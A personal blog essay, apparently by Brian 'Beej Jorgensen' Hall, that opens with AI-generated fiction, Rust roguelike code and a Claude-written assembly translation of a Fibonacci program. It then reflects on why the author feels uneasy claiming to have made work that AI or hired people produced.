Kael pressed his back against the shattered bulkhead, plasma scoring the air centimeters from his face. The Vorrkai assault drones had anticipated their route through the lower decks and now Rin was bleeding through her jacket sleeve and old Maret couldn’t stop coughing from the vented coolant still hazing the corridor. Kael counted the pulse-intervals between shots. Three seconds. Maybe four. That was all the universe was offering him. Then he saw it: the maintenance shaft behind the collapsed generator housing, its grate blown half-open by the same explosion that had caved in their original exit. It was tight. It was ugly. It ran directly over the Vorrkai’s forward position, which was either the most dangerous path imaginable or the last one they’d ever think to watch. Kael grabbed Maret’s collar and pointed without a word. The old man’s eyes went wide, then hard. He nodded. Rin was already moving. Kael came last, returning fire blind around the bulkhead corner, not to hit anything, just to make noise, and to give the drones something thermal to track while his people scrambled into the dark. A bolt caught the generator housing and the whole structure groaned, raining sparks down into the shaft on top of them. He hauled himself in, knees burning on the torn metal, and pulled the grate closed behind him with a sound he was certain every Vorrkai unit on the deck had heard. In the black ahead, Rin’s hand found his wrist. Move, her grip said. Now. And so they did. —Excerpt from The Vorrkai Interval, by Brian “Beej Jorgensen” Hall
Kael pressed his back against the shattered bulkhead, plasma scoring the air centimeters from his face. The Vorrkai assault drones had anticipated their route through the lower decks and now Rin was bleeding through her jacket sleeve and old Maret couldn’t stop coughing from the vented coolant still hazing the corridor. Kael counted the pulse-intervals between shots. Three seconds. Maybe four. That was all the universe was offering him.
Then he saw it: the maintenance shaft behind the collapsed generator housing, its grate blown half-open by the same explosion that had caved in their original exit. It was tight. It was ugly. It ran directly over the Vorrkai’s forward position, which was either the most dangerous path imaginable or the last one they’d ever think to watch. Kael grabbed Maret’s collar and pointed without a word. The old man’s eyes went wide, then hard. He nodded. Rin was already moving.
Kael came last, returning fire blind around the bulkhead corner, not to hit anything, just to make noise, and to give the drones something thermal to track while his people scrambled into the dark. A bolt caught the generator housing and the whole structure groaned, raining sparks down into the shaft on top of them. He hauled himself in, knees burning on the torn metal, and pulled the grate closed behind him with a sound he was certain every Vorrkai unit on the deck had heard. In the black ahead, Rin’s hand found his wrist. Move, her grip said. Now. And so they did.
—Excerpt from The Vorrkai Interval, by Brian “Beej Jorgensen” Hall
And, in my now-copious spare time I make art! This is a woodcut, painted in pastels, showing some of my favorite subjects.
Mirrors of the Machine by Brian “Beej Jorgensen” Hall, $1300.
Carpentry? You bet I dabble! I rebuilt my front deck recently. The old one was rotting out, so I grabbed a bunch of cedar and put it together. I’d been meaning to do it for a while, but couldn’t find the time.
And, finally, here’s some of the code I wrote for a TUI adventure roguelike:
fn try_move(&mut self, dx: i32, dy: i32) { let nx = self.player.x + dx; let ny = self.player.y + dy;
// Check for monster combat if let Some(idx) = self.world.monster_at(nx, ny) { let result = { let monster = &mut self.world.monsters[idx]; resolve_combat(&mut self.player, monster, &mut self.rng) };
self.messages.push_many(result.messages);
if result.monster_defeated { let monster = &self.world.monsters[idx]; let xp = monster.xp_reward; let gold = monster.gold_reward; self.player.xp += xp; self.player.gold += gold; if gold > 0 { self.messages.push(format!(“You find {} gold!”, gold)); } if self.player.try_level_up() { self.messages.push(format!( “Level up! You are now level {}!”, self.player.level )); } }
if !self.player.is_alive() { self.messages.push(“You have been slain! Rest in peace…“); }
self.advance_turn(); return; }
// Check terrain passability if self.world.is_passable(nx, ny) { self.player.x = nx; self.player.y = ny; self.advance_turn(); } else { let terrain = self.world.terrain_at(nx, ny); self.messages.push(format!(“The {} blocks your path.”, terrain.name())); } }
I’m an extremely prolific polymath, I’m sure you’d agree!
I Am Uncomfortable
I don’t like lying. And yet I feel, dear reader, I have misled you. Yes, all that has been created (including my deck) and I was the initiator of all that creation. But I don’t really feel like I made any of it. I’m uncomfortable claiming that I did so.
Since you are certainly aware by now that all of the above is AI-generated (except my deck, which was created by skilled, paid craftsmen), perhaps you feel a little bit of discomfort with me claiming credit for doing those things, too.
However, I don’t think everyone feels this way. I know many people who ask contractors to build things and they phrase it like they built it.
“I put in a new front deck,” they’d say, even though other people did all the work. Personally, I feel that’s misleading. I’m more of a “I had a new front deck put in” kind of person.
And when I do have Claude create something for me, I just can’t say that I made it. Other people can, but I just can’t. Again, I’m more prone to say, “I had this code built for me.” I don’t even feel comfortable MIT-licensing that (not-for-hire) work, if that’s even legally possible. I just Unlicense it all.
As a manager, I’d never say that I built a product. “My team built this,” I’d say. And as a manager of LLMs: “My Agents built this.”
And that, for me, has very little weight in terms of making.
I don’t feel like I did anything. And I like doing things. I find pride in doing things.
Completing projects is great. I love completing projects. Capitalists love completing projects. Real artists ship.
But having others complete projects I initiated is entirely less fulfilling to me.
It’s not just the loss of the craft and the problem-solving challenge and whatever else. It’s the loss of making.
What Did I Make Recently?
My wife wanted a no-frills flash card system for learning Spanish. “I just want a thing where I can put the words I want in a spreadsheet and then see it on flash cards.” A prompt!
So I wrote it. By hand. I did use Claude to learn some basics, like the easiest way to get the data out of a Google Sheet (spoiler: it’s the CSV endpoint), but I told it to generate no code.
–––––––––––––––––––––– Language files code –––––––––––––––––––––– JavaScript 2 112 CSS 1 33 HTML 1 32 –––––––––––––––––––––– SUM: 4 177 ––––––––––––––––––––––
Didn’t take long. Only about 50x longer than it would have taken Claude to do it.
But I can put my name on that code and say that I made it. Was it a lot of code? No. Was it groundbreaking and amazing? Certainly not. But I’m infinitely more proud of that code than anything I’ve had Claude write, because I’m not capable of being proud of the latter.
And my wife wouldn’t go to her book club and say, “I wrote a flash card system to study Spanish.” Admittedly, part of this would be because she didn’t want to appear a geek, but mostly it’s because it’s untrue, even though she initiated the process.
What About The Art and Craft of Prompting?
After all, you create the prompts, don’t you? You said you were proud of doing things. Isn’t that doing a thing? And since so much got done, isn’t it even more of doing a thing?
I don’t disagree. And I do agree that there is skill here in some important ways.
You have to apply vision.
You have to apply judgment.
You have to apply communication skill.
You have to apply prompting skill.
Not all prompts are equally effective. Not all users of AI are as effective as one another. There’s a very human contribution to be made here.
But the skill is in effectively asking someone to make something for you.
“Leadership is the art of getting someone else to do something you want done because he wants to do it.” —Dwight D. Eisenhower
“Leadership is the art of getting someone else to do something you want done because he wants to do it.”
—Dwight D. Eisenhower
And I’m the kind of person who really misses the making of software. And prompting for software, to me, isn’t the same as making the software. It’s the same as asking someone else to make it.
What About Compilers, Smartypants?
Isn’t it just turtles all the way down?
For any given C or Rust program, did I write that program? I wrote it in C. I didn’t write any machine code. The computer wrote that.
There’s something different in my mind about that. I’m not sure if it’s the mathematically-precise relationship between the C and the machine code…? And yet that’s not spelled out. I’m relying on some hacker’s deep knowledge of the CPU to generate that magnificent set of optimized instructions when I stupidly divide something by seven. And it’s not deterministic, strictly, in that Clang and GCC emit different instructions. What about different platforms? The C is portable and the machine code is not. Did I write that program that’s running on Windows even though I personally only ever built it on Linux?
Going further in the murky gray, what if I instruct an LLM to be a C compiler and emit assembly code for some platform?
Let’s try:
Convert this C program into x86_64 assembly for Linux.
#include <stdio.h>
int fib(int n) { if (n <= 1) return n; return fib(n-1) + fib(n-2); }
int main(void) { for (int i = 0; i < 10; i++) printf(“%d: %d\n”, i, fib(i)); }
Claude says:
# fib.s - Recursive Fibonacci, x86_64 Linux, AT&T syntax # Build: gcc fib.s -o fib -no-pie
.section .rodata fmt: .string “%d: %d\n”
.section .text .globl main
# ┌─────────────────────────────────────────────────────┐ # │ int fib(int n) n in: %edi / return: %eax │ # │ Stack frame: │ # │ %rbp-8 = saved %rbx (via push) │ # │ %rbp-12 = n (spilled so it survives both calls) │ # └─────────────────────────────────────────────────────┘ fib: pushq %rbp movq %rsp, %rbp pushq %rbx # callee-saved scratch subq $8, %rsp # 1 local (int n); keeps stack 16-byte aligned
movl %edi, -12(%rbp) # spill n to stack
cmpl $1, %edi jle .Lbase # n <= 1 → return n
# –- fib(n-1) –- movl -12(%rbp), %edi subl $1, %edi call fib movl %eax, %ebx # %ebx = fib(n-1)
# –- fib(n-2) –- movl -12(%rbp), %edi # reload n (call clobbered %edi) subl $2, %edi call fib # %eax = fib(n-2)
addl %ebx, %eax # return fib(n-1) + fib(n-2) jmp .Lret
.Lbase: movl %edi, %eax # return n
.Lret: addq $8, %rsp popq %rbx popq %rbp ret
# ┌─────────────────────────────────────────────────────┐ # │ int main(void) │ # │ Stack frame: │ # │ %rbp-4 = int i (loop counter) │ # └─────────────────────────────────────────────────────┘ main: pushq %rbp movq %rsp, %rbp subq $16, %rsp # locals + alignment
movl $0, -4(%rbp) # i = 0
.Lloop: cmpl $10, -4(%rbp) jge .Ldone # i >= 10 → exit
# fib(i) movl -4(%rbp), %edi call fib
# printf(“%d: %d\n”, i, fib(i)) movl -4(%rbp), %esi # arg2 = i movl %eax, %edx # arg3 = fib(i) leaq fmt(%rip), %rdi # arg1 = fmt (RIP-relative) xorl %eax, %eax # AL=0: no XMM args to printf call printf
addl $1, -4(%rbp) # i++ jmp .Lloop
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
Visit pancik.com for more.